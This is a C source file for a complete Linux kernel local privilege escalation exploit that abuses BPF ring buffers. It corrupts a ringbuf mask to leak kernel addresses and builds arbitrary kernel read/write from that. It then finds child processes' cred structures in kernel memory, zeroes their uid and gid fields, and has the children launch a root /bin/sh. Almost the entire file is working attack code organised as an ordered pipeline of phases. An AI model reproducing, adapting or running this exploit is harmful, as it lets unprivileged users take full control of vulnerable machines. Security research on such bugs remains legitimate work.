#include <signal.h>
#include <sys/prctl.h>
#include <sys/wait.h>

#include "bpf.h"
#include "config.h"
#include "debug.h"
#include "helper.h"

typedef struct {
    u32 rand;

    int comm_fd;
    int array_fd;
    int ringbuf_fd;
    int ringbuf_next_fd;

    int ringbuf_fds[MAP_NUM];
    pid_t processes[PROC_NUM];

    kaddr_t ringbuf;
    kaddr_t ringbuf_pages;
    kaddr_t array_map;
    kaddr_t array_map_ops;
    kaddr_t task_struct;
    kaddr_t cred;

    union {
        u8 bytes[PAGE_SIZE*8];
        u16 words[0];
        u32 dwords[0];
        u64 qwords[0];
        kaddr_t ptrs[0];
    };
} context_t;

/*
 * One step of the pipeline that main() runs in order.
 *
 *   name          label printed in progress messages
 *   func          step implementation; 0 means success, anything else failure
 *   ignore_error  non-zero: run this step even after an earlier step failed
 */
typedef struct {
    const char *name;
    int (*func)(context_t *ctx);
    int ignore_error;
} phase_t;

/*
 * Create the BPF maps used by the later phases.
 *
 * - ctx->comm_fd: a BPF_MAP_TYPE_ARRAY map (created with sizeof(u32),
 *   PAGE_SIZE, 1 — presumably key size, value size, entries; confirm
 *   against bpf_create_map()).
 * - ctx->ringbuf_fds[0..MAP_NUM-1]: BPF_MAP_TYPE_RINGBUF maps.
 *
 * A random index in [0, MAP_NUM - 2] then selects two consecutively created
 * ringbuf maps as ctx->ringbuf_fd and ctx->ringbuf_next_fd.
 *
 * Returns 0 on success, or the negative value returned by bpf_create_map().
 * Descriptors created before a failure stay in ctx; clean_up() closes them.
 */
int create_bpf_maps(context_t *ctx)
{
    int fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1);
    if (fd < 0) {
        WARNF("Failed to create comm map: %d (%s)", fd, strerror(-fd));
        return fd;
    }
    ctx->comm_fd = fd;

    int i = 0;
    while (i < MAP_NUM) {
        fd = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE);
        if (fd < 0) {
            WARNF("Could not create ringbuf map[%d]: %d (%s)", i, fd, strerror(-fd));
            return fd;
        }
        ctx->ringbuf_fds[i++] = fd;
    }

    ctx->rand = urandom();

    const u32 pick = ctx->rand % (MAP_NUM - 1);
    ctx->ringbuf_fd = ctx->ringbuf_fds[pick];
    ctx->ringbuf_next_fd = ctx->ringbuf_fds[pick + 1];

    DEBUGF("random = 0x%08x, idx = %d", ctx->rand, pick);

    return 0;
}

/*
 * Fork PROC_NUM children and record their PIDs in ctx->processes.
 *
 * Each child sets its name to __ID__ (the string find_cred() later searches
 * for), remembers its uid and stops itself with SIGSTOP. Once resumed, it
 * runs /bin/sh if its uid changed to 0, then exits with its current uid as
 * the exit status.
 *
 * Returns 0 on success or the negative fork() result on failure. Children
 * forked before a failure remain stopped until clean_up() sends SIGCONT.
 */
int spawn_processes(context_t *ctx)
{
    for (int n = 0; n < PROC_NUM; n++) {
        pid_t pid = fork();
        if (pid < 0) {
            return pid;
        }
        if (pid > 0) {
            ctx->processes[n] = pid;
            continue;
        }

        /* Child from here on; it never returns to the loop. */
        if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
            WARNF("Could not set name");
        }

        uid_t before = getuid();
        kill(getpid(), SIGSTOP);
        uid_t after = getuid();
        if (after == 0 && before != after) {
            OKF("Enjoy root!");
            system("/bin/sh");
        }
        exit(after);
    }

    return 0;
}

/*
 * Load and run a socket-filter BPF program that:
 *   - looks up element 0 of ctx->comm_fd and uses it as an output buffer,
 *   - uses the ringbuf reserve/submit/discard helpers on ctx->ringbuf_fd to
 *     modify the ringbuf that follows it (see the inline comments),
 *   - stores a 0x13371337 marker plus two kernel values into the comm map.
 *
 * After the run, the comm map value is copied into ctx->bytes. If the marker
 * is present, ctx->ringbuf (leaked value - 8) and ctx->ringbuf_pages are set.
 *
 * The program descriptor is closed on every path; the maps it uses remain
 * open through the descriptors held in ctx.
 *
 * Returns 0 on success, -1 on any failure.
 */
int corrupt_ringbuf(context_t *ctx)
{
    struct bpf_insn insn[] = {
        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r9 = r0
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0xff0, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0xff0),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // === Overwrite ringbuf's mask to 0x80000fff ===
        // r0 = BPF_FUNC_ringbuf_submit(r0-(0x3008-0x38), BPF_RB_NO_WAKEUP)
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (0x3008-0x38)),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x4000-8, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0x4000-8),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(3)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 3),
        BPF_EXIT_INSN(),

        // r6 = (struct ringbuf*)next
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x2000),
        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0x30),

        // if ((struct ringbuf*)(next)->mask != 0xfff) exit(4);
        BPF_MOV64_IMM(BPF_REG_8, 0xfff),
        BPF_JMP_REG(BPF_JEQ, BPF_REG_7, BPF_REG_8, 6),
        // cleanup on error
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 4),
        BPF_EXIT_INSN(),

        // We are lucky, do some leak and overwrite next->mask
        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x30, 0xFFFFFFFE),
        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x34, 0xFFFFFFFF),

        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x8), // ringbuf addr
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x38), // ringbuf pages
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 16),
        BPF_ST_MEM(BPF_DW, BPF_REG_9, 0x0, 0x13371337),

        // Clean up

        // r0 = bpf_ringbuf_discard(r6-0x2000, BPF_RB_NO_WAKEUP)
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    int ret = -1;
    int err = 0;
    int key = 0;

    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), "");
    if (prog < 0) {
        WARNF("Could not load program(corrupt_ringbuf):\n %s", bpf_log_buf);
        goto out;
    }

    err = bpf_prog_skb_run(prog, "TRIGGER", 8);
    if (err != 0) {
        WARNF("Could not run program(corrupt_ringbuf): %d (%s)", err, strerror(err));
        goto out;
    }

    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
    if (err != 0) {
        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
        goto out;
    }

    /* The program writes this marker only after it has stored both values. */
    if (ctx->qwords[0] != 0x13371337) {
        WARNF("Could not leak kernel address. Try again if the kernel is vulnerable");
        goto out;
    }

    ctx->ringbuf = ctx->ptrs[1] - 8;
    ctx->ringbuf_pages = ctx->ptrs[2];

    DEBUGF("ringbuf @ %p", (void *)ctx->ringbuf);
    DEBUGF("ringbuf pages @ %p", (void *)ctx->ringbuf_pages);

    ret = 0;

out:
    if (prog >= 0) close(prog);
    return ret;
}

/*
 * restricted_rw - read (mode >= 0) or write (mode < 0) kernel memory at kaddr,
 * with consequences (*kaddr = 0, *(kaddr-8) = bad_value).
 *
 * @ctx:      state from earlier phases (comm_fd, ringbuf fds, and the
 *            ctx->ringbuf / ctx->ringbuf_pages addresses).
 * @kaddr:    kernel address to access.
 * @buf:      user buffer of at least size*count bytes: destination for a
 *            read, source for a write.
 * @bpf_size: element width; one of BPF_DW, BPF_W, BPF_H, BPF_B.
 * @count:    number of elements to copy.
 * @mode:     >= 0 reads kaddr into buf, < 0 writes buf to kaddr.
 *
 * Data is staged through element 0 of the comm map. A generated BPF program
 * copies it element by element between that map value and kaddr.
 *
 * Returns 0 on success, -1 on failure (bad size, request larger than the
 * staging buffer, allocation failure, or a failing bpf helper).
 */
int restricted_rw(context_t *ctx, kaddr_t kaddr, void* buf, u8 bpf_size, size_t count, int mode)
{
    int size = 0;
    switch (bpf_size)
    {
    case BPF_DW:
        size = 8;
        break;
    case BPF_W:
        size = 4;
        break;
    case BPF_H:
        size = 2;
        break;
    case BPF_B:
        size = 1;
        break;
    default:
        return -1;
    }

    u64 tmp[PAGE_SIZE] = {};

    /* buf is staged through tmp; refuse requests that would overflow it. */
    if (count > sizeof(tmp) / size) {
        WARNF("restricted_rw: %zu elements of %d bytes exceed the staging buffer", count, size);
        return -1;
    }

    int ret = -1;
    int prog = -1;
    int err = 0;
    int key = 0;    /* the comm map has a single element at key 0 */

    u64 delta = ctx->ringbuf_pages + 0x30 - (ctx->ringbuf + 0x3000 + 8);
    u64 offset = kaddr - (ctx->ringbuf_pages + 0x30);

    // DEBUGF("restricted_rw %s %p by %p + %p (delta %p)", mode>=0 ? "read":"write", (void*)kaddr, (void*)ctx->ringbuf_pages + 0x30, (void*)offset, (void*)delta);

    struct bpf_insn prefix[] = {
        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r9 = r0
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x5000-8, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, 0x5000-8),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // r8 = delta
        BPF_MOV32_IMM(BPF_REG_8, (u32)(delta>>32)),
        BPF_MOV32_IMM(BPF_REG_2, (u32)(delta&0xFFFFFFFF)),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),
        BPF_ALU64_REG(BPF_OR, BPF_REG_8, BPF_REG_2),

        // next->producer_pos = delta
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x4000),

        // r0 = bpf_ringbuf_discard(r0, BPF_RB_NO_WAKEUP)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_next_fd, offset+PAGE_SIZE, 0) # point to ctx->ringbuf_pages + 0x30
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_next_fd),
        BPF_MOV64_IMM(BPF_REG_2, offset+PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // if (r0 == NULL) exit(3)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 3),
        BPF_EXIT_INSN(),

        // *r0 = 0x80000000
        BPF_MOV64_IMM(BPF_REG_1, 1),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 31),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        // r0 += offset
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, (u32)(offset)),
    };

    struct bpf_insn suffix[] = {
        // r0 point to kaddr, we need to fix that before submit
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (u32)(offset)),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 8),
        // r0 = bpf_ringbuf_submit(r0, BPF_RB_NO_WAKEUP)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    size_t prefix_cnt = sizeof(prefix)/sizeof(prefix[0]);
    size_t suffix_cnt = sizeof(suffix)/sizeof(suffix[0]);
    /* prefix, one load + one store per element, then suffix */
    size_t insn_cnt = prefix_cnt + suffix_cnt + count*2;

    struct bpf_insn *insn = calloc(insn_cnt, sizeof(*insn));
    if (!insn) {
        WARNF("Failed to allocate insn buffer: out of memory");
        return -1;
    }

    struct bpf_insn *p = insn;
    memcpy(p, prefix, sizeof(prefix));
    p += prefix_cnt;

    /* Read: kernel (r0) -> map value (r9). Write: map value (r9) -> kernel (r0). */
    u8 src = mode >= 0? BPF_REG_0 : BPF_REG_9;
    u8 dst = mode >= 0? BPF_REG_9 : BPF_REG_0;
    for (size_t i = 0; i < count; i++) {
        int off = (int)i * size;
        *p++ = BPF_LDX_MEM(bpf_size, BPF_REG_1, src, off);
        *p++ = BPF_STX_MEM(bpf_size, dst, BPF_REG_1, off);
    }

    memcpy(p, suffix, sizeof(suffix));

    prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, insn_cnt, "");
    if (prog < 0) {
        WARNF("Failed to load program(read):\n %s", bpf_log_buf);
        goto out;
    }

    if (mode < 0) {
        memcpy(tmp, buf, size*count);
        err = bpf_update_elem(ctx->comm_fd, &key, tmp, 0);
        if (err != 0) {
            WARNF("Failed to update comm map: %d (%s)", err, strerror(err));
            goto out;
        }
    }

    if ((err = bpf_prog_skb_run(prog, "tr3e of SecCoder Security Lab", 30)) != 0) {
        WARNF("Failed to run program(read): %d (%s)", err, strerror(err));
        goto out;
    }

    /* mode >= 0 is a read, as documented above: copy the result back out. */
    if (mode >= 0) {
        err = bpf_lookup_elem(ctx->comm_fd, &key, tmp);
        if (err != 0) {
            WARNF("Failed to lookup comm map: %d (%s)", err, strerror(err));
            goto out;
        }
        memcpy(buf, tmp, size*count);
    }

    ret = 0;

out:
    if (prog >= 0) close(prog);
    free(insn);
    return ret;
}

/*
 * Locate a cred pointer belonging to one of the children named __ID__ and
 * store it in ctx->cred.
 *
 * Starting at ctx->ringbuf_pages + 0x30, reads up to 2*PAGE_SIZE consecutive
 * pages with restricted_rw() and searches each page for every occurrence of
 * __ID__. For each hit, it reads the two 8-byte values located 0x10 bytes
 * before it. It takes the second one, or the first if the second is 0 (the
 * slot may hold cred or cached_requested_key). The candidate is accepted if
 * it lies strictly between ctx->ringbuf_pages and ctx->ringbuf_pages + 512 MiB.
 *
 * Returns 0 once ctx->cred is set, -1 if a page read fails or nothing matches.
 */
int find_cred(context_t *ctx)
{
    kaddr_t kaddr = ctx->ringbuf_pages + 0x30;

    for (int i = 0; i < 2*PAGE_SIZE; i++)
    {
        if (restricted_rw(ctx, kaddr, ctx->bytes, BPF_DW, PAGE_SIZE/8, 1) != 0) {
            WARNF("Could not find task_struct from kernel vmalloc memory");
            return -1;
        }

        u8 *scan = ctx->bytes;
        size_t left = PAGE_SIZE;
        for (;;) {
            int offset = memoff(scan, left, __ID__, sizeof(__ID__));
            if (offset < 0) break;

            /* offset is relative to scan, which advances after every hit;
             * convert it to an offset from the start of the page at kaddr. */
            size_t page_off = (size_t)(scan - ctx->bytes) + (size_t)offset;

            kaddr_t creds[2] = {};
            kaddr_t cred_from_task = kaddr + page_off - 0x10;
            if (restricted_rw(ctx, cred_from_task, creds, BPF_DW, 2, 1) != 0) {
                WARNF("Could not read kernel address %p", (void *)cred_from_task);
                break;
            }
            // could be cred or cached_requested_key
            kaddr_t cred = creds[1] != 0 ? creds[1] : creds[0];
            DEBUGF("Found an candidate task %p, cred %p", (void *)cred_from_task, (void *)cred);
            if (cred != 0 && cred > ctx->ringbuf_pages && cred < ctx->ringbuf_pages + (1<<29)) {
                ctx->cred = cred;
                DEBUGF("task struct ~ %p", (void *)cred_from_task);
                DEBUGF("cred @ %p", (void *)ctx->cred);
                return 0;
            }
            scan += offset + sizeof(__ID__);
            left -= offset + sizeof(__ID__);
        }
        kaddr += PAGE_SIZE;
    }

    return -1;
}

/*
 * Zero the uid, gid, euid and egid fields of the cred at ctx->cred, one
 * 32-bit write per field via restricted_rw() in write mode.
 *
 * Stops at the first failing write. Returns 0 on success, -1 on failure.
 */
int overwrite_cred(context_t *ctx)
{
    const size_t field_offsets[] = {
        OFFSET_uid_from_cred,
        OFFSET_gid_from_cred,
        OFFSET_euid_from_cred,
        OFFSET_egid_from_cred,
    };
    const size_t nfields = sizeof(field_offsets) / sizeof(field_offsets[0]);
    u64 zero = 0;

    for (size_t k = 0; k < nfields; k++) {
        if (restricted_rw(ctx, ctx->cred + field_offsets[k], &zero, BPF_W, 1, -1) != 0) {
            return -1;
        }
    }

    return 0;
}

/*
 * Send SIGCONT to every child recorded in ctx->processes, then reap children
 * until wait() stops returning a positive PID. Always returns 0.
 */
int spawn_root_shell(context_t *ctx)
{
    const pid_t *pid = ctx->processes;
    const pid_t *const end = pid + PROC_NUM;
    while (pid != end) {
        kill(*pid++, SIGCONT);
    }

    for (;;) {
        if (wait(NULL) <= 0) {
            break;
        }
    }
    return 0;
}

/*
 * Always-run final phase: close the BPF map descriptors stored in ctx, then
 * send SIGCONT to the caller's process group so no child stays stopped.
 *
 * main() zero-initialises ctx, so a descriptor that is still 0 was never
 * opened (e.g. create_bpf_maps() failed early). Such entries are skipped so
 * that standard input is not closed by mistake. Always returns 0.
 */
int clean_up(context_t *ctx)
{
    if (ctx->comm_fd > 0) {
        close(ctx->comm_fd);
    }
    for (int i = 0; i < MAP_NUM; i++) {
        if (ctx->ringbuf_fds[i] > 0) {
            close(ctx->ringbuf_fds[i]);
        }
    }
    kill(0, SIGCONT);
    return 0;
}

/*
 * Pipeline run in order by main(). After a phase fails, later phases are
 * skipped unless they set .ignore_error.
 */
phase_t phases[] = {
    { .name = "create bpf map(s)", .func = create_bpf_maps,  .ignore_error = 0 },
    { .name = "corrupt ringbuf",   .func = corrupt_ringbuf,  .ignore_error = 0 },
    { .name = "spawn processes",   .func = spawn_processes,  .ignore_error = 0 },
    { .name = "find cred (slow)",  .func = find_cred,        .ignore_error = 0 },
    { .name = "overwrite cred",    .func = overwrite_cred,   .ignore_error = 0 },
    { .name = "spawn root shell",  .func = spawn_root_shell, .ignore_error = 0 },
    { .name = "clean up the mess", .func = clean_up,         .ignore_error = 1 },
};

int main(int argc, char** argv)
{
    context_t ctx = {};
    int err = 0;
    int max = sizeof(phases) / sizeof(phases[0]);
    if (getuid() == 0) {
        BADF("You are already root, exiting...");
        return -1;
    }
    for (int i = 1; i <= max; i++)
    {
        phase_t *phase = &phases[i-1];
        if (err != 0 && !phase->ignore_error) {
            ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name);
            continue;
        }
        ACTF("phase(%d/%d) '%s' running", i, max, phase->name);
        int error = phase->func(&ctx);
        if (error != 0) {
            BADF("phase(%d/%d) '%s' return with error %d", i, max, phase->name, error);
            err = error;
        } else {
            OKF("phase(%d/%d) '%s' done", i, max, phase->name);
        }
    }
    return err;
}